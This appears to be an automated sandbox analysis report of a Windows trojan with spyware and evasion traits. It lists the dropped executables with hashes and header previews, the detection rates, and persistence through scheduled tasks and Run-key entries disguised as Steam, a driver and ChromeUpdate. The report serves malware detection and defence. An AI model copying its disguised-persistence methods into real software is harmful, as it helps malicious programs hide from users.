Classification: mal100.troj.spyw.evad.winEXE@56/31@94/17
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 83.3%
                                                                                                                                                                                                            HDC Information:
                                                                                                                                                                                                            • Successful, ratio: 29.6% (good quality ratio 24.7%)
                                                                                                                                                                                                            • Quality average: 67.8%
                                                                                                                                                                                                            • Quality standard deviation: 37%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 96%
                                                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Adjust boot time
                                                                                                                                                                                                            • Enable AMSI
                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                            Warnings:
                                                                                                                                                                                                            Show All
                                                                                                                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.54.110.249, 20.189.173.20, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 23.211.4.86, 20.189.173.21
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, yandex.ru, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, iplogger.org, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, microsoft.com, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                                            • Execution Graph export aborted for target B3BA.exe, PID 1756 because it is empty
                                                                                                                                                                                                            • Execution Graph export aborted for target B3BA.exe, PID 4264 because there are no executed function
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
23:29:09  Task Scheduler   Run new task: Firefox Default Browser Agent EDCB7C3654C5C579 path: C:\Users\user\AppData\Roaming\ujhcrda
23:29:21  API Interceptor  1x Sleep call for process: 7063.exe modified
23:29:32  API Interceptor  10x Sleep call for process: svchost.exe modified
23:29:41  API Interceptor  1x Sleep call for process: WerFault.exe modified
23:30:08  API Interceptor  3x Sleep call for process: 1BCC.exe modified
23:30:10  Task Scheduler   Run new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
23:30:20  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
23:30:32  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_s.exe
23:30:42  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
23:30:53  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_s.exe
23:31:06  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start ChromeUpdate.lnk

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: MPEG-4 LOAS
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.24859360587628684
Encrypted: false
SSDEEP: 1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU46:BJiRdwfu2SRU46
MD5: A83E0A729D4A1F55166CB05328B01B69
SHA1: CB9E63E045059073AC31F4A4630B1228444D4015
SHA-256: E390FCBF4FF541845B1C55FBA10CBDCEA0C364620A90280EA1BD75E27BD118B1
SHA-512: E779E06BA24BD4409354222DF3E22C31250BCC279157F7020BFBA3259A985506DCDD3B3178F068C2E9DD1AE65E56247F1EAFA1A89649C1ACC46A9517D1E4424A
Malicious: false
Reputation: unknown
Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage user DataBase, version 0x620, checksum 0x81ef5937, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 786432
Entropy (8bit): 0.25071192802551023
Encrypted: false
SSDEEP: 384:c+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:DSB2nSB2RSjlK/+mLesOj1J2
MD5: 18F46E54AD0F6D90BAA6DD6ADDBB5B06
SHA1: 02A2CD28172475401FA0EB4DEFED4116A27C504B
SHA-256: 635C3E6F66EC0E3AE0A794FE3F336039F8D3FDB65269E216051F6844B6293FD2
SHA-512: C50F160F2B9676EFE8C3C13EA911A3C8B9AD5132D8214CBCF605B4984C1AA77AAF28DE98CFF0B6880B79B4BC16FC734B62BFAC4D04465AEEBA4F19D976C66ECC
Malicious: false
Reputation: unknown
Preview: ..Y7... ................e.f.3...w........................&..........w..*....z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................k.#.*....z.u...................*....z..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07743634763724366
Encrypted: false
SSDEEP: 3:Gwlt1EvPzghl/bJdAtiSPzW01oll3Vkttlmlnl:GQysht4rzK3
MD5: 6C5620A22A87F1FAA1C600661C7FB193
SHA1: BF2C1E30D2423E49777823EBF419C0B070BE65CC
SHA-256: F2EAB83FE956D6CCAA66597AC764992AFAFDF32BC472C16C17721711685E9E23
SHA-512: 7308CFE4C3AF2F52388AD915E55AFDEC057B4146DF2CC342335821EDEBC20FEFECBBBF5ED636F3B8AFB238A048859A189C3574B03127E23B013CB1330EC23DC2
Malicious: false
Reputation: unknown
Preview: ........................................3...w..*....z.......w...............w.......w....:O.....w.....................*....z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_60C2.exe_b994e4a82aa011c06f96cb901a89f64e833a6a1c_f737e9d6_0beefd4a\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8141362247109446
Encrypted: false
SSDEEP: 96:f8NFFznbXSGLzCHyA+9OQoJ7R3V6tpXIQcQec6tycEfcw3WFz+HbHg/8BRTf3o8e:UnznW4eSo8HQ0l7jIq/u7syS274Itf
                                                                                                                                                                                                            MD5:8E70A2A7A41C0DAA597D4DE569DD1103
                                                                                                                                                                                                            SHA1:1DC0A1EDC935BF48C2ABC3EFB1E9718ADDFEEFE8
                                                                                                                                                                                                            SHA-256:923DFEF1785F738691F6ADB632C2765D66DDD11CEC802678AAD12CD9196B6D7F
                                                                                                                                                                                                            SHA-512:04CB2EE6D8F3461987DCA542929C8E5DFC379DB932E069FB6DEC4750A8BBBD28ADD933DB651CB39E7516F0FC5B48A939E75A02247CE56649152AB3E526B392A3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER27C7.tmp.csv
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):53092
                                                                                                                                                                                                            Entropy (8bit):3.0504300134413387
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:6gHzsgnsrlS1jO9AEojWxfbWIwtt0IbRpvuCPYq:6gHzsgnsrlS1jO9AEojWxfSIwtt0IbR5
                                                                                                                                                                                                            MD5:C011905D2C70667B9C517B4D7E3ACDA2
                                                                                                                                                                                                            SHA1:B70D4DDD72CBCCE688B3B3AD22BCD006D123C096
                                                                                                                                                                                                            SHA-256:93E4F641A0328CD61DDFA891D41D5970476DC6C7B63A47FECF0C11967BDF950B
                                                                                                                                                                                                            SHA-512:2C90438FABB46A25AC6441A602BE70EF872A4951D17F8D0215724158844CDD9E2450644DAD757214167F5AD2BCDA2707BEE7C7B2753F6F6CC5E5A96A10767A0E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AD2.tmp.txt
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13340
                                                                                                                                                                                                            Entropy (8bit):2.6994209673274248
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9GiZYWJ0G7p9WYXY6W18eziHdYEZ7xtYiAkwvjOwdSCaAcEtqhXg7IV713:9jZDJ0vAOXCIXharEqhXpV713
                                                                                                                                                                                                            MD5:4C6B1B2C012A457482F8CBB38B75888D
                                                                                                                                                                                                            SHA1:F7DB80090AEE55660CC28A073F1F4AED0F332D26
                                                                                                                                                                                                            SHA-256:42B29C438F9A38548D3C5BF4C662069D6C2D102DED5E97EB15FA4787DD0B9E2E
                                                                                                                                                                                                            SHA-512:896FAC6BB53B169ECF864947ACD1C5B9CE74C1BE65FCC953C961259473C97A7C5A9FFB7AC63A46B417E50CB46C47BD80D53C53A553B07E6E16C35E2F747E3BC7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C4C.tmp.txt
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13340
                                                                                                                                                                                                            Entropy (8bit):2.696610353143529
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9GiZYWGPcKi3YuYkWazH6nYEZgAtPiTFK+6wR56aW0pMBi4yENIv0B3:9jZDbpIeBkaW0iBi4yzsB3
                                                                                                                                                                                                            MD5:FF0B8841B96BCFC15D8534442B4DB606
                                                                                                                                                                                                            SHA1:5210CF5DD5921B479EFFDE18E5AC82F0F852D0AD
                                                                                                                                                                                                            SHA-256:2BA90252B066DDBB6E4C60E984E3B6A20473D208CEDBCC55E6C81811B491074B
                                                                                                                                                                                                            SHA-512:582AC00D42F0D4E0CD6B704707920CA0596211B54BA1E0EF6D4D9C942FF3AD70908B672D0FCBAFB285A80CA7628E184297661CE9B2D7136E31BA36BE9F3DE6C0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER4237.tmp.dmp
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Fri Jan 14 07:29:24 2022, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36668
                                                                                                                                                                                                            Entropy (8bit):2.1215398826650915
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:5JS888//qUNJHeuuoi7ehEnus9D5a5aiqQ9E+5RVhTugZM2rgGosz30k2WInWIXH:RXRrNHOeh0k6+nrrfos4k7SkcEIJ
                                                                                                                                                                                                            MD5:AB57E822444B815F1AE1D46462953A26
                                                                                                                                                                                                            SHA1:09B089DC757DE5244BD68A45D68D87805D2B7E17
                                                                                                                                                                                                            SHA-256:FF1E2FCAA91C87802E5154F2C9157BDDCA188F5F954E634237B0BD485EBA13AA
                                                                                                                                                                                                            SHA-512:80348AD1738352FC2C7643AE5557ABA684DB91D71C0CC7880CD5A79AB975160D37342124C70854AE02BCE6A68AD1043FBD08960B0E67CC67096DC3E42D167666
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER44E.tmp.csv
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61464
                                                                                                                                                                                                            Entropy (8bit):3.0333924723012595
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:pPHmopTW2gAbslRhHVAEFh5e8vATrKVNB/9KJxs/fwe:pPHmopTW2gAbslRhHVpFh5e8vATrKVNF
                                                                                                                                                                                                            MD5:C69B0E4857750FCCC49E90AE82BFDA7B
                                                                                                                                                                                                            SHA1:749AC3C4FA1376349529E79466D165F7C9C9B071
                                                                                                                                                                                                            SHA-256:F8056552462B214AB6E2015013FFAEB9D8EF71B7F19EC19F166418E062799006
                                                                                                                                                                                                            SHA-512:4368B704EE08A61D5D68BA8C798E3AAC30EA05468AE3CE6EA80DD2D45856F298FEFBE70DA2F2D3C33BE125E34C2A468FB4AB77D4431386591E2B07B9B34FD3E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER48A1.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8390
                                                                                                                                                                                                            Entropy (8bit):3.698995042194666
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Rrl7r3GLNiJs67sQ6YJtSUggmfcRSgCpD389bfEYsfcj1m:RrlsNiC67sQ6YDSUggmfcRSYfELfcM
                                                                                                                                                                                                            MD5:F8B49D24DAB61629DBB4C193F37A628D
                                                                                                                                                                                                            SHA1:036A1F7B6B1C50D44714BD3D54A89357CD23EBF1
                                                                                                                                                                                                            SHA-256:8E3897A6926F9A21310DB0B023C9BF2CDD9BF393D5E7ED0D968DD9D5652C21C1
                                                                                                                                                                                                            SHA-512:D6434F1E91ACA6EAA4600FBB2BD67EEB6CDB4209795E9576EB54042B1FEDE8BF42C62B6B881F667D5D92F7B96401B35FC7C52BE70622D45A2DD2CC130A8A8754
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D84.tmp.xml
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4685
                                                                                                                                                                                                            Entropy (8bit):4.47237264790422
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwSD8zsRJgtWI9LDWSC8Br/8fm8M4Jd8qFR+q8v58u1E/EnaMd:uITfjcySNuJzKFRnaMd
                                                                                                                                                                                                            MD5:2B73F70467BA437B411066239627D3AD
                                                                                                                                                                                                            SHA1:9F2057968FC910968C129DA384900FF9B167D6E5
                                                                                                                                                                                                            SHA-256:705A61F9FACB547638362C1C7E8C2F85ABA41AEF45802B1AB66772BABBA3A898
                                                                                                                                                                                                            SHA-512:181E3D7715D468E483C43E84C40A980D78FF7C9408F7463BB3DA051463D3F432CDF1408B1C89265731964259CC955500E1BF8389E132F8B497C9BFAABDF1B1CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1341640" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B3BA.exe.log
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):700
                                                                                                                                                                                                            Entropy (8bit):5.346524082657112
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                                            MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                                            SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                                            SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                                            SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1BCC.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):905216
                                                                                                                                                                                                            Entropy (8bit):7.399713113456654
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\382E.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):373760
                                                                                                                                                                                                            Entropy (8bit):6.990411328206368
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                                                                                                                                            MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                                                                                                                                            SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                                                                                                                                            SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                                                                                                                                            SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\5126.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):356864
                                                                                                                                                                                                            Entropy (8bit):7.848593493266229
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:v5aWbksiNTBiNg5/dEQECtD2YajndnU4aomwStqUJE0ra7yswH:v5atNTMNg5eQX2BdUcDStq+J4bwH
                                                                                                                                                                                                            MD5:6E7430832C1C24C2BF8BE746F2FE583C
                                                                                                                                                                                                            SHA1:158936951114B6A76D665935AD34F6581556FCDF
                                                                                                                                                                                                            SHA-256:972D533E4DF0786799C0E7C914AA6C04870753C10757C5D58CD874B92A7F4739
                                                                                                                                                                                                            SHA-512:79289323C1104F7483FAC9BF2BCAB5B3804C8F2315C8EDEA9D7C83C8B68B64473122F9B38627169D64A35A960A5F74A3364159CA9CB37B0A2B1BA1B41607A8C8
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\60C2.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):301056
                                                                                                                                                                                                            Entropy (8bit):5.192330972647351
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                                                                                                            MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                                            SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                                                                                                            SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                                                                                                            SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\6674.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3570176
                                                                                                                                                                                                            Entropy (8bit):7.997630766149595
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:98304:Eyu1PF0IdV1/b4gfya9kofb/4rosp08oUPQH:EjtFp/tfyOTQrosGrUP0
                                                                                                                                                                                                            MD5:DDC599DB99362A7D8642FC19ABE03871
                                                                                                                                                                                                            SHA1:11199134356D8DE145D2EE22AAC37CA8AABA8A0B
                                                                                                                                                                                                            SHA-256:5D94F66FD3315E847213E16E19DFEB008B020798CFFF1334D48AC3344B711F22
                                                                                                                                                                                                            SHA-512:E35DBE56828E804AA78FE436E1717C3A09C416DBE2873FFFC9B44393E7EC2336CE9C544E4D6011C58E7E706819AEABC027AF9A85AA2A2509BDFC39699560ABFD
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.a.................$...................@....@.......................... T.....b.6.....................................|lO. .....M...................................................................................................................... ..........................@................0......................@...........&....@......................@................0......................@............1...P......................@............02......./.................@....rsrc.........M......40.............@....T3QbYgM.....`O.......1.............@....adata........T......z6.............@...........................................................................................................................................................................................................................................................................
